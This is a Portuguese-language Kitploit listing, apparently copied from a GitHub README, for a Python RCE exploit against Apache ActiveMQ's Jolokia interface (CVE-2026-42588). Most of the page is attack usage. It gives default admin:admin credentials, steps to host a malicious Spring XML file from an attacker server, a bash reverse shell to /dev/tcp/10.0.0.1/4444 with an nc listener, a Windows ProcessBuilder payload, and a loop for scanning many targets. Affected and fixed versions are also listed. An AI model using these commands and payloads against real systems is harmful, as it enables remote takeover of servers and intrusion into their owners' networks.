Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-42588 — Exploit RCE baseado em Python para CVE-2026-42588 visando Apache ActiveMQ Jolokia. Apresenta modo somente verificação, geração de XML malicioso e suporte para reverse shell, OOB e verificação baseada em arquivo. | Kitploit
Ferramentas/GitHubGitHub/hnytgl/cve-2026-42588
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingFerramenta de Acesso Remoto
GitHubhnytgl/cve-2026-42588

CVE-2026-42588

Exploit RCE baseado em Python para CVE-2026-42588 visando Apache ActiveMQ Jolokia. Apresenta modo somente verificação, geração de XML malicioso e suporte para reverse shell, OOB e verificação baseada em arquivo.

Ver Repositório
37há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-42588 - Exploração de Execução Remota de Código no Apache ActiveMQ Jolokia

Nível de gravidade: 🔴 Alto (CVSS 4.0: 8.1)
Tipo de vulnerabilidade: CWE-94 — Injeção de código
Versões afetadas: Apache ActiveMQ < 5.19.7 / 6.0.0 ≤ versão < 6.2.6
Pré-requisito de exploração: Necessita de credenciais de autenticação do Web Console (padrão admin:admin)


📋 Índice

  • Visão geral da vulnerabilidade
  • Princípio da vulnerabilidade
  • Versões afetadas
  • Condições de exploração
  • Descrição dos arquivos
  • Início rápido
  • Modo de uso detalhado
  • Panorama da cadeia de exploração
  • Verificação do sucesso da exploração
  • Solução de correção
  • Medidas de mitigação temporárias
  • FAQ
  • Aviso de isenção de responsabilidade
  • Links de referência

Visão geral da vulnerabilidade

CVE-2026-42588 é uma vulnerabilidade de execução remota de código (RCE) pós-autenticação existente no Apache ActiveMQ.

Um atacante, de posse de credenciais de autenticação do Web Console, pode invocar o método BrokerService.addNetworkConnector(String) através da interface de ponte Jolokia JMX-HTTP (/api/jolokia/), fornecendo uma URI masterslave:// cuidadosamente construída, utilizando o protocolo xbean: para carregar um arquivo de configuração Spring XML remoto, resultando na execução de comandos arbitrários do sistema na JVM do ActiveMQ Broker.


Princípio da vulnerabilidade

Cadeia de exploração

/api/jolokia/ (Ponte JMX-HTTP Jolokia)
       │
       ▼
BrokerService.addNetworkConnector(String)
       │
       ▼
masterslave://?brokerConfig=xbean:http://atacante/malicioso.xml
       │
       ▼
XBeanBrokerFactory → ResourceXmlApplicationContext
       │
       ▼
Pré-instanciação de todos os beans singleton do Spring → Aciona Runtime.exec() / ProcessBuilder
       │
       ▼
🚨 Execução remota de código (RCE)

Pontos técnicos principais

EtapaDescrição
Superfície de exposição JolokiaO Web Console do ActiveMQ expõe por padrão /api/jolokia/, permitindo a execução da operação exec nos MBeans org.apache.activemq:*
Método perigosoBrokerService.addNetworkConnector(String) recebe uma URI de discovery e a processa
Cadeia de acionamento por URIO parâmetro brokerConfig do protocolo masterslave:// é controlável, combinado com o scheme xbean: para acionar o carregamento do contexto Spring
Ponto de acionamento RCEO XBeanBrokerFactory utiliza ResourceXmlApplicationContext para carregar um XML remoto; o Spring instancia todos os beans singleton antes mesmo da validação da configuração

Versões afetadas

Faixa de versãoStatus
Apache ActiveMQ < 5.19.7❌ Afetado
6.0.0 ≤ Apache ActiveMQ < 6.2.6❌ Afetado
Apache ActiveMQ ≥ 5.19.7✅ Corrigido
Apache ActiveMQ ≥ 6.2.6✅ Corrigido

Condições de exploração

  1. ✅ Acessibilidade de rede — A interface /api/jolokia/ deve estar acessível ao atacante (porta padrão 8161)
  2. ✅ Credenciais válidas — Possuir credenciais de autenticação do Web Console do ActiveMQ (padrão admin:admin)
  3. ✅ Serviço HTTP do atacante — Necessário um servidor HTTP acessível pelo alvo para hospedar o arquivo XML malicioso

Descrição dos arquivos

.
├── CVE-2026-42588_EXP.py   # Script de exploração (principal)
├── malicious.xml            # Modelo de XML Spring malicioso
├── requirements.txt         # Dependências Python
└── README.md                # Este arquivo
ArquivoFinalidade
CVE-2026-42588_EXP.pyScript de exploração em Python, suporta modo de detecção (--check-only) e modo de geração de XML (--gen-xml)
malicious.xmlModelo de configuração Spring XML malicioso, contém dois métodos de exploração: Runtime.exec() e ProcessBuilder

Início rápido

1. Instalar dependências

pip install -r requirements.txt

2. Gerar arquivo XML malicioso

python CVE-2026-42588_EXP.py --gen-xml -c "touch /tmp/activemq_pwned" > malicious.xml

3. Hospedar arquivo XML malicioso

Inicie um serviço HTTP na máquina atacante:

python3 -m http.server 8080

4. Executar a exploração

# Usando credenciais padrão admin/admin
python CVE-2026-42588_EXP.py \
    -u http://192.168.1.100:8161 \
    -x http://seu-ip-atacante:8080/malicious.xml

# Usando credenciais personalizadas
python CVE-2026-42588_EXP.py \
    -u http://alvo:8161 \
    -U meuusuario \
    -P minhasenha \
    -x http://seu-ip-atacante:8080/malicious.xml

5. (Opcional) Apenas detectar a vulnerabilidade

python CVE-2026-42588_EXP.py -u http://192.168.1.100:8161 --check-only

Modo de uso detalhado

Parâmetros da linha de comando

usage: CVE-2026-42588_EXP.py [-h] [-u URL] [-U USERNAME] [-P PASSWORD]
                             [-x XML_URL] [--check-only] [--gen-xml]
                             [-c COMMAND] [--timeout TIMEOUT] [--no-verify]

Opções:
  -u, --url         URL do ActiveMQ alvo (ex: http://192.168.1.100:8161)
  -U, --username    Nome de usuário do Web Console (padrão: admin)
  -P, --password    Senha do Web Console (padrão: admin)
  -x, --xml-url     URL remota do arquivo Spring XML malicioso
  --check-only      Apenas verificar se a interface Jolokia está acessível
  --gen-xml         Gerar arquivo XML malicioso e enviar para stdout
  -c, --command     Comando a ser executado no alvo (padrão: touch /tmp/activemq_pwned)
  --timeout         Tempo limite em segundos para requisições HTTP (padrão: 30)
  --no-verify       Desabilitar verificação de certificado SSL

Cenário 1: Reverse Shell

1. Gerar XML malicioso na máquina atacante:

python CVE-2026-42588_EXP.py --gen-xml \
    -c "/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'" \
    > reverse_shell.xml

2. Hospedar XML e iniciar listener:

# Terminal 1: Serviço HTTP
python3 -m http.server 8080

# Terminal 2: Listener nc
nc -lvnp 4444

3. Acionar a vulnerabilidade:

python CVE-2026-42588_EXP.py \
    -u http://alvo:8161 \
    -x http://10.0.0.1:8080/reverse_shell.xml

Cenário 2: Execução de comando CMD (alvo Windows)

1. Gerar XML malicioso para Windows:

Modifique o comando do ProcessBuilder em malicious.xml para:

<bean class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
        <list>
            <value>cmd.exe</value>
            <value>/c</value>
            <value>whoami &gt; C:\windows\temp\pwned.txt</value>
        </list>
    </constructor-arg>
</bean>

2. Hospedar e executar:

python CVE-2026-42588_EXP.py \
    -u http://windows-alvo:8161 \
    -x http://atacante:8080/malicious_win.xml

Cenário 3: Apenas detecção de vulnerabilidade

# Detecção em lote
for ip in $(cat targets.txt); do
    echo "=== Testando $ip ==="
    python CVE-2026-42588_EXP.py -u "http://$ip:8161" --check-only --timeout 5
done

Panorama da cadeia de exploração

Baixar ferramenta